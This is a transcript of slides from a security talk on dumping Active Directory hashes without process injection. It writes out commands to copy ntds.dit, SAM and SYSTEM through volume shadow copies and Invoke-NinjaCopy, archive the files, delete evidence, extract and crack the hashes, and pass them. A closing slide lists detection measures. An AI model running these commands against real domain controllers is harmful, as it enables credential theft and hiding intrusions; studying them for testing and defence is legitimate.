Dumping AD Hashes Without Process Injection

Transcript

1. Dumping AD Hashes Without Process Injection Russ Swift @0xsalt

2. evolution and history non-injection methods getting tools to the dc

   volume shadow copy & powersploit export & extract History Methods Extraction DC Access VSS & PSH Cracking overview of cracking method hash passing tools Tools Detect detect vssown / ninjacopy activity?

3. $ id swiftruss @0xsalt github.com/0xsalt blog.0xsalt.com InfoSec Manager at a

   financial services SaaS company in LA  West Coast: Hiring  East Coast: I know a guy 10 years infosec experience SANS Advisory Board For my good friends Mark, Jeff, Scott who will mock me while not understanding a lick of this -- this is not about hash that needs salt, hash that you smoke or hash that you tag someone with. They are not octothorpes. These are hashes that you dump, crack and pass. Thank you for interacting with me like a normal person despite all the 10101110001 I speak.

4. 2000-2001+ pwdump2, pwdump3e, fgdump, pwdump6 : lsass injection  dll

   injection into lsass.exe.  DEP interaction causes crash & reboot 2007 "priv hashdump" since metasploit 3.0 : lsass injection  injects raw assembly code  AntiVirus API hooking causes crash & reboot 2010 "run hashdump" : no injection, needs system  direct registry access in memory  slow, no evidence, 100% safe  must have SYSTEM History

5. 2011 mimikatz! : lsass injection  dumps cleartext from WDigest

   provider 2012 vssown.vbs : no injection, needs admin  Mark Baggett (@MarkBaggett) & Tim Tomes (@lanmaster53)  Derbycon 2 2013 Invoke-NinjaCopy powershell script : no injection, needs admin  parses NTFS structures directly  bypasses file locks, only SYSTEM access History

6. Methods non-injection, let me count the ways  reboot dc

   to alternate media and copy files off  steal virtual container (GuestStealer v1.1 perl script to steal files via wget path traversal from old esx/vmware server systems)  rogue esx / hyper-v admins  metasploit run hashdump  vss service to copy ntds.dit, system, sam from live system  ninjacopy powersploit script

7.  Hack, sniff, ask nicely  LM smb relay 

   WKS -> SRV -> AD Escalation  Have a hash / generate a hash DC Access Obtain an administrative credential

8. Remote desktop Wce Psexec Mimikatz Winexe nmap + smb-exec.nse Meterpreter

   FingerprintEncryption Winrm + powershell DC Access Gain access

9.  Find a reasonable writeable directory  AV exclusion folders

   are handy for this  Upload script(s) with meterpreter  Copy / paste into cmd window to create file  Copy via a file share DC Access

10.  cscript vssown.vbs /list, /start, /create C, copy files, /delete

    [id] and/or stop service  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ ntds\ntds.dit .  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ system32\config\SAM .  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ system32\config\SYSTEM . VSS & PSH volume shadow copy service

11.  cscript vssown.vbs /list  cscript vssown.vbs /start  cscript

    vssown.vbs /create C  cscript vssown.vbs /list VSS & PSH VSS: create volume shadow copy

12. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\ntds\ntds .dit . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\ config\SYSTEM . copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy73\windows\system32\

    config\SAM . VSS & PSH VSS: copy ntds.dit, SYSTEM and SAM

13.  rar a -rr2p -u -ep1 %computername%.rar -hp%computername% ntds.dit SYSTEM

    SAM  cscript vssown.vbs /list  cscript vssown.vbs /delete [id]  del ntds.dit & del SYSTEM & del SAM & del vss.vbs & del rar.exe VSS & PSH VSS: compress, copy off system, cleanup

14.  .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SAM" - RemoteDestination "c:\temp\SAM" –ComputerName servername.domain.com 

    .\Invoke-NinjaCopy.ps1 -Path "c:\windows\system32\config\SYSTEM" -RemoteDestination "c:\temp\SYSTEM" -ComputerName servername.domain.com  .\Invoke-NinjaCopy.ps1 -Path "c:\windows\ntds\ntds.dit" - RemoteDestination "c:\temp\ntds.dit" –ComputerName servername.domain.com VSS & PSH powersploit invoke-ninjacopy

15.  apt-get install bkhive samdump2  Download / extract libesedb

    from http://sourceforge.net/projects/libesedb/  Download / extract ntdsxtract from: http://www.csababarta.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip  cd libesedb  chmod +x configure  ./configure && make  Download / extract dshashes.py into NTDSXTRACT 1.0 folder from: http://ptscripts.googlecode.com/svn/trunk/dshashes.py Extraction on a linux system configure your tools

16. ./esedbexport ../ntds.dit Extraction prep ntds.dit

17. •./esedbexport ../ntds.dit Extraction prep ntds.dit

18.  Csaba Barta ntdsxtract + dsusers.py patched version  python

    /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 -- passwordhashes ./SYSTEM > domain_controller.hash.txt Extraction extract hashes

19.  Csaba Barta ntdsxtract + dsusers.py patched version  python

    /home/swiftr/tools/vss/NTDSXtract\ 1.0/dshashes.py ./ntds.dit.export/datatable.3 ./ntds.dit.export/link_table.5 -- passwordhistory ./SYSTEM > domain_controller.hash.txt Extraction extract historical hashes : default=24

20. ./john --pot=test.pot --session=lanman --format=LM hashes/lmntlm.txt ./john --pot=test.pot --session=ntlm --wordlist=mywordlist.lst --rules

    -- format=NT hashes/lmntlm.txt Cracking overview of cracking method

21.  Create a wordlist from previously cracked passwords to create

    patterns  https://www.question-defense.com/2010/08/15/automated- password-cracking-use-oclhashcat-to-launch-a-fingerprint-attack  http://blog.thireus.com/cracking-story-how-i-cracked-over-122- million-sha1-and-md5-hashed-passwords Cracking Run oclHashcat fingerprint attack

22.  impacket libraries (wmiexec, smbclient, smbrelayx)  WCE  mimikatz

     patched samba tools, winexe  firefox  xfreerdp (MS just released kb2871997 to address restricted admin)  pth to rdp session w/ no creds in memory (no kb2871997) -OR-  credentials are stored in WDigest in plaintext (yes kb2871997) Tools pass the hashes

23.  intelligent log analysis  anomalous user activity alerting 

    anomalous network flows  leave VSS off by default, alert if it's turned on  DLP on DCs  correct audit settings on DCs  you do have full pcaps of all your egress traffic right?! Detect detect vssown / ninjacopy activity?

24. evolution and history non-injection methods getting tools to the dc

    volume shadow copy & powersploit export & extract History Methods Extraction DC Access VSS & PSH Cracking overview of cracking method hash passing tools Tools Detect detect vssown / ninjacopy activity?

25.  http://packetstormsecurity.com/Crackers/NT/  http://blog.gentilkiwi.com/downloads/mimikatz-asfws.pdf  https://code.google.com/p/ptscripts/source/browse/trunk/windows/vssown.vbs  https://community.rapid7.com/community/metasploit/blog/2010/01/01/safe-reliable-hash-dumping  https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

     http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket  http://www.ampliasecurity.com/research/wcefaq.html  http://passing-the-hash.blogspot.com/  @obscuresec Chris Campbell  Alva "Skip" Duckwall  https://code.google.com/p/passing-the-hash/  http://www.fyrmassociates.com/tools.html  http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl  http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/  http://technet.microsoft.com/en-us/library/hh994571(v=ws.10).aspx  http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib  http://www.josho.org/blog/blog/2013/03/07/samex/  http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html  http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/  http://www.room362.com/blog/2013/06/11/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-2/ References